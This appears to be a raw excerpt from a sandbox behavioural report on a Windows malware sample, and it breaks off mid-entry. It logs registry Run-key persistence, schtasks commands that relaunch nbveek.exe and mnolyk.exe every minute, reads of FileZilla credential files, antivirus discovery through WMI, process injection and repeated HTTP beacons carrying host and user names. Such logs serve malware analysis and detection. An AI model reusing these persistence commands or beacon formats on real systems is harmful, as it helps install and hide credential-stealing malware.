reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\truno.exe reg_value C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
Time & API Arguments Status Return Repeated

LdrGetDllHandle

module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
wmi SELECT * FROM Win32_VideoController
wmi SELECT * FROM AntivirusProduct
wmi SELECT * FROM Win32_OperatingSystem
wmi SELECT * FROM Win32_Process Where SessionId='1'
wmi SELECT * FROM AntiSpyWareProduct
wmi SELECT * FROM FirewallProduct
wmi SELECT * FROM Win32_DiskDrive
wmi SELECT * FROM Win32_Processor
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 3044
process_handle: 0x0000002c
1 1 0
Time & API Arguments Status Return Repeated

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Excel MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft PowerPoint MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Publisher MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Outlook MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Word MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - English
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Outils de vérification linguistique 2013 de Microsoft Office - Français
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - Español
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft InfoPath MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft DCF MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft OneNote MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Groove MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM UX MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Lync MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Acrobat Reader DC MUI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000290
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0
Process injection Process 2984 called NtSetContextThread to modify thread in remote process 3044
Process injection Process 2732 called NtSetContextThread to modify thread in remote process 2976
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2005598660
registers.esp: 1834392
registers.edi: 0
registers.eax: 4306318
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000020
process_identifier: 3044
1 0 0

NtSetContextThread

registers.eip: 2005598660
registers.esp: 2161196
registers.edi: 0
registers.eax: 4306298
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000027c
process_identifier: 2976
1 0 0
Time & API Arguments Status Return Repeated

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.67&sd=c51b61&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
